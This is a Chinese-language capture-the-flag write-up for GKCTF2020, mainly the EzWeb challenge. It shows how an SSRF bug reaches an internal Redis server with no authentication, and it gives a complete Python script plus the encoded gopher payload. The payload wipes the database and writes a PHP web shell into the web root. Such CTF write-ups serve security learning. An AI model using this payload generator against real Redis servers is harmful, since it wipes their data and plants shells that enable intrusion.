文章目录
[GKCTF2020]老八小超市儿(shopxo后台全版本拿shell)
跟着这篇文章一步步做就能拿到flag
[GKCTF2020]EZ三剑客-EzWeb(redis未授权访问)
一,信息收集
题目源码提示了?secret
,访问得到了靶机的ip地址,可以考虑进行内网探测。
二,bp扫C段:
三,扫端口
然后扫描端口
扫描到6379端口,6379为redis默认端口,然后看了看wp,才知道是redis的未授权访问漏洞,参考浅析Redis中SSRF的利用
四,利用脚本生成payload
直接用文章中的exp
改为了python3:
import urllib
import requests
protocol="gopher://"
ip = "192.168.163.128"
port = "6379"
shell = "\n\n<?php system(\"cat /flag\") ?>\n\n"
filename = "pass.php"
path = "/var/www/html"
passwd = ""
payload = ''
cmd = ["flushall",
"set 1 {}".format(shell.replace(" ", "${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF = "\r\n"
redis = arr.split()
cmd = ""
cmd+="*"+str(len(redis))
for x in redis:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.parse.quote(redis_format(x))
print(payload)
使用得到的payload:
gopher://173.0.41.11:6379/%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%20%3F%3E%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%248%0D%0Apass.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A
然后访问生成的pass.php得到flag。
173.0.41.11/pass.php